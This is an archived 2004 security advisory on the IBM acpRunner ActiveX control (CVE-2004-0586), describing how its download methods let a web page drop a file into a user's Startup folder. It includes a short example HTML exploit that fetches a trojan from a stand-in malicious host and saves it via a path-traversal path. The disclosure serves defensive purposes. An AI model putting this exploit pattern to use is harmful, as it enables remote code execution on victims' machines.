Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   IBM acpRunner Vendors:   IBM
IBM acpRunner ActiveX Control Has Unsafe Methods That Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1010499
SecurityTracker URL:
CVE Reference:   CVE-2004-0586   (Links to External Site)
Updated:  Jun 24 2004
Original Entry Date:  Jun 16 2004
Impact:   Execution of arbitrary code via network, Modification of system information, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): acpRunner Activex Version
Description:   A vulnerability was reported in IBM acpRunner. A remote user can execute arbitrary code on the target system.

eEye Digital Security reported that the eGatherer ActiveX component contains several methods that allow a remote user to write a file to the target user's startup folder. The affected methods include "DownLoadURL", "SaveFilePath", and "Download".

A remote user can create HTML that, when loaded by the target user, will cause a file to be written to the startup folder and then later executed when the system restarts. Using this method, a remote user can execute arbitrary code on the target system with the privileges of the target user.

The vendor was reportedly notified on February 20, 2004.

The original advisory is available at:

A demonstration exploit is described in the advisory.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version, available at:

Vendor URL: (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents


IBM acpRunner Activex Dangerous Methods Vulnerability

Release Date:
June 15, 2004

Date Reported:
February 20, 2004

Patch Development Time (In Days):

High (Remote Code Execution)


Systems Affected:
acpRunner Activex Version

eEye Digital Security has discovered a security vulnerability in IBM's signed "acpRunner" 
activex. Because this application is signed, it might be presented to users on the web for 
execution in the name of IBM. If users trust IBM, they will run this, and their systems 
will be compromised. This activex was designed by IBM to be used for an automated support 
solution for their PC's. An unknown number of systems already have this activex on their 

The issue is quite simple. Activex is a very profound web technology. As a profound web 
technology it may be abused. Designers might create an activex which could perform any 
function on an user's computer. Microsoft relies on trust for the security model and warns 
against making activex with dangerous capabilities. The responsibility, however, rests 
with the creator of the activex, as in any trust model.

In this case, IBM made available methods named such as "DownLoadURL", "SaveFilePath", and 
"Download". Almost needless to say, these methods allow a remote attacker to have a victim 
system silently download the file of their choosing into the location of their choosing. 
By downloading an executable file to the Startup folder, this malicious executable would 
be automatically executed on start up.

Technical Details:
-----------EXAMPLE HTML---------

<BR><BR><object width="310" height="20" 
id="runner" classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3" 
<BR><BR><script><BR>runner.DownLoadURL = "http://malicioussystem/trojan.exe";
<BR>runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
<BR>runner.FileSize = 96,857;
<BR>runner.FileDate = "01/09/2004 3:33";


In the above example, we see the object called utilizing the "object" tag. The codebase 
tag is used by the browser to initiate the install of the activex if it is not already 
existing on the system. This would bring up the activex prompt which essentially asks the 
user if they trust IBM. Finally, the object is named "runner", so we might reference it 
later in script and use its' dangerous methods.

In the script we see we access the dangerous methods of "runner" in a completely 
straightforward manner. The "saveFilePath" method uses a local url on the user's system 
which will accurately point to the user's startup folder. Finally, the method "Download" 
is called, and a progress meter shows the trojan file being downloaded to the exploit 
folder on the user's system. At restart, the OS would automatically run the trojan.

Retina Network Security Scanner has been updated to identify this vulnerability.

Vendor Status:
IBM has released a patch for this vulnerability. The patch is available at the following 

Additional Research: Drew Copley

Related Links:
Retina Network Security Scanner - Free 15 Day Trial

Pistone, FBI)

Copyright (c) 1998-2004 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is 
not to be edited in any way without express consent of eEye. If you wish to reprint the 
whole or any part of this alert in any other medium excluding electronic medium, please 
email for permission.

The information within this paper may change without notice. Use of this information 
constitutes acceptance for use in an AS IS condition. There are no warranties, implied or 
express, with regard to this information. In no event shall the author be liable for any 
direct or indirect damages whatsoever arising out of or in connection with the use or 
spread of this information. Any use of this information is at the user's own risk.


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC